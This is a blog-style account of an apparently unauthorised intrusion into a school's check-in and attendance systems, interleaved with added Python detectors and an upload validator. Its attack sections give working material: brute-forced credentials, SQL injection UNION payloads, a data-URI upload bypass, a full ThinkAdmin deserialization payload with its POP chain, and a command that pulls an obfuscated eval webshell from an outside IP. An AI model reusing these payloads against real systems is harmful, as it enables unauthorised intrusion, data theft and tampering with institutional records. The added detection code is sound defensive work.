Title: Defeat one by one! Take down the core system of the school

0x01 Introduction

Because of the epidemic, the school's Yiban APP added a check-in system that requires a morning check and an afternoon check every day. If you forget one, you have to write a review of thousands of words.

I am deeply dissatisfied with this kind of "formalism". As it happens, I had just set up a cybersecurity team, so I got ready to take it on.

0x02 Scouting

I won't say much about basic information gathering.

The different systems run on multiple servers, so this can't be solved in one go: winning the core system requires a wonderful penetration journey through the school's various systems and servers.

Then we get our hands on the core system.

First, open the homepage of the "Yiban" system. This is what it looks like:

Image

It is not hard to see that the developer used the TP (ThinkPHP) framework. I quickly tested the various TP injection and RCE payloads, but they all failed; their security awareness doesn't seem too bad.

The homepage under this domain is just an error page, with no functional points or information at all.

As the saying goes, the quality of information gathering directly decides the success or failure of the penetration, so we can never be careless.

Let's first fuzz the first-level directories.

Image

The results are pretty good: lots of directories and functional points.

Then I kept fuzzing the second-level directories under each first-level directory, continually exploring the functional points deployed under this domain.

I won't post screenshots of the details, because there are too many first-level directories.

Once the functional points are understood, roll up your sleeves and get to work.

0x03 Penetration of the mental health system (IIS short file name - old login page - brute force - new login page - upload)

Brute-forcing the first-level directories turned up this path:

http://xxx.xxx.edu.cn/psy

A psychological health education system was deployed there, and the middleware was IIS.

However, the login page of the mental health system has a CAPTCHA mechanism, and the CAPTCHA is not easy to recognise.

Image

I immediately thought of the IIS short file name feature, so I scanned with the IIS short file name directory scanner (https://github.com/lijiejie/IIS_shortname_Scanner).

Image

This gave the old login page of another system:

http://xxx.xxx.edu.cn/psy/Login2.aspx

Image

As shown in the figure, there is no CAPTCHA mechanism.

Brute-forced it directly with Burp's Cluster bomb attack type.

Successfully obtained the weak password of the other system: admin / Aa123456

However, the other pages of the old system have been deleted, so it is not possible to log in to the backend normally.

Image

But I guessed that the old and new systems use the same database.

Go to the new system:

http://xxx.xxx.edu.cn/psy/Login.aspx

Log in with admin / Aa123456, and it succeeds.

Image

Look for upload points in the backend.

Image

The upload point is:

http://xxx.xxx.edu.cn/psy/ScaleManage/ScaleEdit.aspx?ScaleListID=1

Adding a topic on the scale platform allows arbitrary file upload.

(That's right, this upload point; it can be said to be quite hidden, and it took a long time to find.)

Image

Uploading an aspx file redirects inexplicably, asp is not parsed, so I uploaded an asmx webshell directly.

Executed commands through the debugging module of AWVS 10.

Image

The privilege is net service.

Used Cobalt Strike's PowerShell one-liner to bring the host online directly.

Image

The patches seem to be fully applied.

I ran through the various local privilege escalations once, but none of them worked.

COM components, potatoes: none of them could escalate even after being tried. Let's leave it at this for now; if the privilege escalation works out, I'll add it.

Initial foothold in the mental health system obtained.

0x04 Live broadcast system interface injection

After entering the live broadcast system, I found no point worth using; the development was probably not finished yet.

Image

But in Burp I found a request to an ajax interface. The HTTP request is as follows:

POST /index.php/Live/index/seat_ajax.html HTTP/1.1
Host: xxx.xxx.edu.cn
Content-Length: 24
Accept: */*
Origin: http://xxx.xxx.edu.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; U; Android 5.1; zh-CN; 1501_M02 Build/LMY47D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.0.818 U3/0.8.0 Mobile Safari/534.30
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxx.xxx.edu.cn/index.php/Live/index/seat?place_id=10&active_id=20
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=s0clwrginz0rw3x0smtwtsgg; PHPSESSID=7985bf0a5f38e5922a651ac1f4ef9b1a; PHPSESSID=7985bf0a5f38e5922a651ac1f4ef9b1a
Connection: close

place_id=10&active_id=20

Image

Fuzzed to find the SQLi payload.

Image

Both id parameters have union injection.

Image

Construct the payload:

) UNION ALL SELECT NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Neqy

As shown in the figure, the current_user information was successfully obtained:

'[email protected]

Construct the payload:

place_id=10) UNION ALL SELECT NULL,NULL,NULL,NULL,group_concat(SCHEMA_NAME),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.schemata-- Neqy&active_id=20&active_id=20

Image

I won't demonstrate the other tables, columns and data here; that's just a matter of writing out one-liners, very simple.

Later I found that the databases of many other systems were involved, but I didn't find the database of the core system I wanted most.
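A defender's counterpart to this section, added here as an example and not part of the original post: the seat_ajax endpoint only ever expects numeric ids, so a log inspector can flag both non-numeric id values and UNION ... SELECT padded with whitespace or inline comments in request bodies. The log lines are constructed for the example; the real fix on the application side is to bind place_id and active_id as integer parameters in the query.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines "<method> <path> <body>" modelled on the seat_ajax request
# above; the bodies are made up for this example.
SAMPLE_LOG = """\
POST /index.php/Live/index/seat_ajax.html place_id=10&active_id=20
POST /index.php/Live/index/seat_ajax.html place_id=10)%20UNION%20ALL%20SELECT%20NULL,NULL,user(),NULL--%20Neqy&active_id=20
POST /index.php/Live/index/seat_ajax.html place_id=10&active_id=20)/**/union/**/select/**/null,NULL,NULL--%20x
POST /index.php/Live/index/seat_ajax.html place_id=10&active_id=20&note=the%20union%20meeting
"""

ID_PARAM = re.compile(r"(^|_)id$")   # place_id, active_id, id ...
NUMERIC = re.compile(r"^\d+$")       # the endpoint only ever expects integer ids
# UNION [ALL] SELECT with whitespace or inline comments padding the keywords.
UNION_SELECT = re.compile(r"union(\s|/\*.*?\*/)+(all(\s|/\*.*?\*/)+)?select", re.I)

def analyse_request(body: str) -> list:
    """Findings for one urlencoded request body (empty list when it looks normal)."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if ID_PARAM.search(name) and not NUMERIC.match(value):
            findings.append(f"{name}: non-numeric id {value[:40]!r}")
        if UNION_SELECT.search(value):
            findings.append(f"{name}: UNION SELECT pattern")
    return findings

def scan_log(log: str) -> dict:
    """Map 1-based line number -> findings, for the lines that carry findings."""
    hits = {}
    for number, line in enumerate(log.splitlines(), 1):
        parts = line.split(" ", 2)
        if len(parts) == 3:
            findings = analyse_request(parts[2])
            if findings:
                hits[number] = findings
    return hits

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG).items():
        print(number, findings)
```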

0x05 A boring base64 upload

After fuzzing functional points, I found a place where pictures can be uploaded without authorization:

http://xxx.xxx.edu.cn/v4/public/weui/demo/form12.html

Image

Image

When uploading a jpeg picture I noticed data:image/jpeg. I changed it directly to image/php, base64-encoded the upload content, and submitted it.

Image

Getshell succeeded with SYSTEM privileges, which saved the privilege escalation.

Image
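Added example, not code from the post or from the upload form: how the form12.html upload handler should have treated the data: URI. It treats the declared MIME type only as an allowlist check, decodes the base64 body, and derives the stored extension from the file's magic bytes, so image/php, or PHP source labelled image/jpeg, is rejected; the sample inputs are constructed.

```python
import base64
import binascii
import re
from typing import Optional, Tuple

# Declared types the form may claim, and the extension a stored file gets. The extension
# comes from the detected content type below, never from the declared string.
ALLOWED = {"image/jpeg": ".jpg", "image/png": ".png"}
MAGIC = {b"\xff\xd8\xff": "image/jpeg", b"\x89PNG\r\n\x1a\n": "image/png"}
DATA_URI = re.compile(r"^data:([\w.+-]+/[\w.+-]+);base64,([A-Za-z0-9+/=\s]*)$")

def sniff_image(blob: bytes) -> Optional[str]:
    """Content type from the leading bytes, or None if it is not an image we know."""
    for magic, mime in MAGIC.items():
        if blob.startswith(magic):
            return mime
    return None

def validate_upload(data_uri: str, max_bytes: int = 2_000_000) -> Tuple[bool, str]:
    """Return (True, extension) when the upload is accepted, (False, reason) otherwise."""
    m = DATA_URI.match(data_uri)
    if not m:
        return False, "not a base64 data URI"
    declared = m.group(1).lower()
    if declared not in ALLOWED:                      # image/php stops here
        return False, "declared type %s not allowed" % declared
    try:
        blob = base64.b64decode(re.sub(r"\s", "", m.group(2)), validate=True)
    except binascii.Error:
        return False, "invalid base64"
    if len(blob) > max_bytes:
        return False, "too large"
    actual = sniff_image(blob)
    if actual is None:                               # e.g. PHP source behind a jpeg label
        return False, "content is not a recognised image"
    if actual != declared:
        return False, "declared %s but content is %s" % (declared, actual)
    return True, ALLOWED[actual]

# Constructed samples: a JPEG SOI marker with padding (not a real picture) and a PHP stub.
JPEG_STUB = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_STUB = b"<?php echo 1; ?>"

def make_uri(mime: str, blob: bytes) -> str:
    """Build the data: URI the form submits, with the given declared type."""
    return "data:%s;base64,%s" % (mime, base64.b64encode(blob).decode())
```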

0x06 Wonderful penetration of the core system (Nday deserialization + command execution bypass + race condition getshell)

After searching and searching, bleak and desolate, I finally found our core system that controls "Yiban":

http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.Update/tree

Image

Victory is right in front of us; we have to take it down even if it means not sleeping.

All kinds of fuzzing and all kinds of operations were lined up, but none of them were any use, and I still couldn't get in.

Give up? Impossible, that's not our style.

While carefully checking the page JS, I found this interesting piece of information:

Image

My eyes lit up. Damn, ThinkAdmin! It had a deserialization Nday before, let's arrange it!

http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.Update/tree

PostData:

rules=a%3A2%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%2 2%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A %22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr %22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data% 22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3 Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00 hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00 withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Di%3A1%3Bi%3A123%3B%7D //Execute whoami

Image

The deserialization POP chain is as follows:

<?php
namespace think;
use think\model\Pivot;

abstract class Model{
    private $lazySave=false; # save()
    private $exists=false; # updateData()
    protected $connection;
    protected $name; # __toString() Conversion.php => Pivot
    private $withAttr=[]; # assert
    protected $hidden=[];
    private $data=[];
    protected $withEvent=false;
    private $force=false;
    protected $field=[];
    protected $schema=[];
    function __construct(){
        $this->lazySave=true;
        $this->exists=true;
        $this->withEvent=false;
        $this->force=true;
        $this->connection='mysql';
        $this->withAttr=['test'=>'system'];
        $this->data=['test'=>'whoami'];
        $this->hidden=['test'=>'123'];
        $this->field=[];
        $this->schema=[];
    }
}

namespace think\model;
use think\Model;
# Model is an abstract class, so we need one of its subclasses; here we pick the Pivot class
class Pivot extends Model{
    function __construct($obj=''){
        parent::__construct();
        $this->name=$obj; # $this->name is set in the subclass constructor; initialising it directly as a base class attribute does not work
    }
}

$a=new Pivot();
echo urlencode(serialize([new Pivot($a),123]));

Image
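Added detection example, not part of the original post or of ThinkAdmin: the rules parameter above carries PHP-serialized objects, which a request inspector can spot by the O:<length>:"<class>" header together with the class name length check. The sample body is a shortened, constructed version of the request above; on the application side the fix is to never pass request data to unserialize(), or at least to call it with the allowed_classes option set to false.

```python
import re
from urllib.parse import parse_qsl

# Header of a serialized PHP object: O:<byte length of class name>:"<class name>":
PHP_OBJECT = re.compile(r'O:(\d+):"([^"]*)"')

def php_classes(value: str) -> list:
    """Class names of every serialized PHP object header found in one parameter value."""
    found = []
    for length, name in PHP_OBJECT.findall(value):
        # A genuine header states the exact byte length; this filters lookalikes in free text.
        if int(length) == len(name.encode()):
            found.append(name)
    return found

def inspect_body(body: str, allowed_classes=()) -> list:
    """(parameter, class) pairs whose class is not allowlisted; each one would be
    instantiated if the parameter reached unserialize() without allowed_classes."""
    alerts = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for cls in php_classes(value):
            if cls not in allowed_classes:
                alerts.append((name, cls))
    return alerts

# Constructed body modelled on the ThinkAdmin request above and cut down to the two
# nested Pivot objects; %00 is the prefix PHP puts on serialized private/protected names.
SAMPLE_BODY = (
    "rules=a%3A2%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7B"
    "s%3A7%3A%22%00%2A%00name%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A0%3A%7B%7D"
    "s%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3B%7Di%3A1%3Bi%3A123%3B%7D"
)

if __name__ == "__main__":
    for param, cls in inspect_body(SAMPLE_BODY):
        print(f"serialized object of class {cls!r} in parameter {param!r}")
```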

The privilege is SYSTEM, hahahahaha, God helps me too.

But I ran into many problems writing the shell with the echo command: the command cannot contain spaces, and the shell has to be written in a single command, otherwise an error is reported. Spaces get converted to + and the backend cannot recognise them.

Image

After persistent manual testing, I found that /\ can bypass the restriction on spaces.

Then used command splicing to bypass the write detection.

But the target machine has a WAF, and an ordinary webshell gets killed after a few seconds.

So why not download a WAF-evading webshell directly through a race condition? Construct a command that downloads the undetected shell through the race condition:

echo/^^?phps1.phpecho/file_put_contents('s2.php',file_get_contents('http://49.x.x.x:8080/shell.txt'));^gt;gt;gt;s2.php

The content of the shell is as follows:

<?php
function test($php_c0d3){
    $password='skr';//EnvPwd
    $cr=preg_filter('/\s+/','','c h r');
    $bs64=preg_filter('/\s+/','','bas e64 _de cod e');
    $gzi=$cr(103).$cr(122).$cr(105).$cr(110);
    $gzi.=$cr(102).$cr(108).$cr(97).$cr(116).$cr(101);
    $c=$bs64($php_c0d3);
    $c=$gzi($c);
    @eval($c);
}
$php_c0d3='S0lNy8xL1VAvzkjNySlILC5W11EBUeX'.
'5RSma1rxcKgWZeWm2KvFBroGhrsEh0UogvlIsUC'.
'YzTQMiaatUmVqspFnNy1WQARLI1wBprAXi1LLEH'.
'A2EXrgdsZrWAA==';
test($php_c0d3);
?>

Generate the PostData with the deserialization POP chain.
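Added example, not part of the post: a small static scan for the obfuscation pattern this shell uses (function names reassembled by stripping whitespace from a literal, a chr() alias concatenated into gzinflate, and eval on the decoded result). The sample below is a constructed copy of the shell's decoder structure with the payload string left out.

```python
import re

# $alias = preg_filter('/\s+/','','bas e64 _de cod e'): whitespace stripped at run time.
ASSIGN_ALIAS = re.compile(
    r"\$(\w+)\s*=\s*preg_(?:filter|replace)\(\s*'/\\s\+/'\s*,\s*''\s*,\s*'([^']*)'\s*\)")
ASSIGN = re.compile(r"\$(\w+)\s*(\.?)=\s*([^;]+);")   # $var = ... ; and $var .= ... ;
CALL_NUM = re.compile(r"\$(\w+)\((\d+)\)")           # $cr(103): numeric call through an alias
EVAL = re.compile(r"@?\beval\s*\(")
DANGEROUS = {"chr", "base64_decode", "gzinflate", "gzuncompress", "str_rot13",
             "system", "exec", "shell_exec", "passthru", "assert"}

def alias_map(src: str) -> dict:
    """Variable -> function name hidden behind a whitespace-stripped literal."""
    return {var: re.sub(r"\s+", "", lit) for var, lit in ASSIGN_ALIAS.findall(src)}

def chr_strings(src: str, aliases: dict) -> dict:
    """Strings built from chr() calls through an alias, e.g. $cr(103).$cr(122) -> 'gz'."""
    chr_vars = {v for v, fn in aliases.items() if fn == "chr"}
    out = {}
    for var, _, rhs in ASSIGN.findall(src):
        chars = [chr(int(n)) for v, n in CALL_NUM.findall(rhs) if v in chr_vars]
        if chars:
            out[var] = out.get(var, "") + "".join(chars)   # covers both = and .=
    return out

def analyse(src: str) -> dict:
    """Report hidden function names and whether the file evals something."""
    aliases = alias_map(src)
    strings = chr_strings(src, aliases)
    hidden = sorted({fn for fn in list(aliases.values()) + list(strings.values()) if fn in DANGEROUS})
    return {"aliases": aliases, "strings": strings, "hidden_calls": hidden,
            "eval": bool(EVAL.search(src))}

# Constructed sample in the style of the shell above, payload string omitted.
SAMPLE_SHELL = r"""<?php
function test($php_c0d3){
$cr=preg_filter('/\s+/','','c h r');
$bs64=preg_filter('/\s+/','','bas e64 _de cod e');
$gzi=$cr(103).$cr(122).$cr(105).$cr(110);
$gzi.=$cr(102).$cr(108).$cr(97).$cr(116).$cr(101);
$c=$bs64($php_c0d3);
$c=$gzi($c);
@eval($c);
}
"""
```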

Call it directly:

http://xxx.xxx.edu.cn/v4/public/s2.php

Password: skr

Take it directly.

Image

Finally got this core system for check-in, late-arrival reporting and attendance; with adminer I got into the database and decrypted the administrator password.

Damn, you still want me to write a review? Go eat shit.
